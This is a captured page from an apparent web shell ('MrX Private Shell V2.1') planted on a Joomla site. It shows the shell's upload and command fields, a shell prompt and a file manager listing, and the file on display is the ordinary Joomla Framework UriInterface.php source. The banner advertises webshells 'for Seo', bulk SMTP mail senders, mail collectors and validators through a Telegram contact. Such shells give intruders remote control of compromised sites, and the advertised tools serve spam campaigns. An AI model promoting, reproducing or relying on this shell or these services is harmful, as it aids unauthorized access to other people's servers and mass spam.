__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * Part of the Joomla Framework Uri Package
 *
 * @copyright  Copyright (C) 2005 - 2022 Open Source Matters, Inc. All rights reserved.
 * @license    GNU General Public License version 2 or later; see LICENSE
 */

namespace Joomla\Uri;

/**
 * Uri Interface
 *
 * Interface for read-only access to URIs.
 *
 * @since  1.0
 */
interface UriInterface
{
    /**
     * Include the scheme (http, https, etc.)
     *
     * @var    integer
     * @since  1.2.0
     */
    public const SCHEME = 1;

    /**
     * Include the user
     *
     * @var    integer
     * @since  1.2.0
     */
    public const USER = 2;

    /**
     * Include the password
     *
     * @var    integer
     * @since  1.2.0
     */
    public const PASS = 4;

    /**
     * Include the host
     *
     * @var    integer
     * @since  1.2.0
     */
    public const HOST = 8;

    /**
     * Include the port
     *
     * @var    integer
     * @since  1.2.0
     */
    public const PORT = 16;

    /**
     * Include the path
     *
     * @var    integer
     * @since  1.2.0
     */
    public const PATH = 32;

    /**
     * Include the query string
     *
     * @var    integer
     * @since  1.2.0
     */
    public const QUERY = 64;

    /**
     * Include the fragment
     *
     * @var    integer
     * @since  1.2.0
     */
    public const FRAGMENT = 128;

    /**
     * Include all available url parts (scheme, user, pass, host, port, path, query, fragment)
     *
     * @var    integer
     * @since  1.2.0
     */
    public const ALL = 255;

    /**
     * Magic method to get the string representation of the URI object.
     *
     * @return  string
     *
     * @since   1.0
     */
    public function __toString();

    /**
     * Returns full URI string.
     *
     * @param   array  $parts  An array of strings specifying the parts to render.
     *
     * @return  string  The rendered URI string.
     *
     * @since   1.0
     */
    public function toString($parts = ['scheme', 'user', 'pass', 'host', 'port', 'path', 'query', 'fragment']);

    /**
     * Checks if variable exists.
     *
     * @param   string  $name  Name of the query variable to check.
     *
     * @return  boolean  True if the variable exists.
     *
     * @since   1.0
     */
    public function hasVar($name);

    /**
     * Returns a query variable by name.
     *
     * @param   string  $name     Name of the query variable to get.
     * @param   string  $default  Default value to return if the variable is not set.
     *
     * @return  mixed  Requested query variable if present otherwise the default value.
     *
     * @since   1.0
     */
    public function getVar($name, $default = null);

    /**
     * Returns flat query string.
     *
     * @param   boolean  $toArray  True to return the query as a key => value pair array.
     *
     * @return  array|string   Query string, optionally as an array.
     *
     * @since   1.0
     */
    public function getQuery($toArray = false);

    /**
     * Get the URI scheme (protocol)
     *
     * @return  string  The URI scheme.
     *
     * @since   1.0
     */
    public function getScheme();

    /**
     * Get the URI username
     *
     * @return  string  The username, or null if no username was specified.
     *
     * @since   1.0
     */
    public function getUser();

    /**
     * Get the URI password
     *
     * @return  string  The password, or null if no password was specified.
     *
     * @since   1.0
     */
    public function getPass();

    /**
     * Get the URI host
     *
     * @return  string  The hostname/IP or null if no hostname/IP was specified.
     *
     * @since   1.0
     */
    public function getHost();

    /**
     * Get the URI port
     *
     * @return  integer  The port number, or null if no port was specified.
     *
     * @since   1.0
     */
    public function getPort();

    /**
     * Gets the URI path string
     *
     * @return  string  The URI path string.
     *
     * @since   1.0
     */
    public function getPath();

    /**
     * Get the URI anchor string
     *
     * @return  string  The URI anchor string.
     *
     * @since   1.0
     */
    public function getFragment();

    /**
     * Checks whether the current URI is using HTTPS.
     *
     * @return  boolean  True if using SSL via HTTPS.
     *
     * @since   1.0
     */
    public function isSsl();
}

Filemanager

Name Type Size Permission Actions
AbstractUri.php File 9.34 KB 0664
Uri.php File 3.97 KB 0664
UriHelper.php File 2.03 KB 0664
UriImmutable.php File 1.52 KB 0664
UriInterface.php File 4.32 KB 0664
Filemanager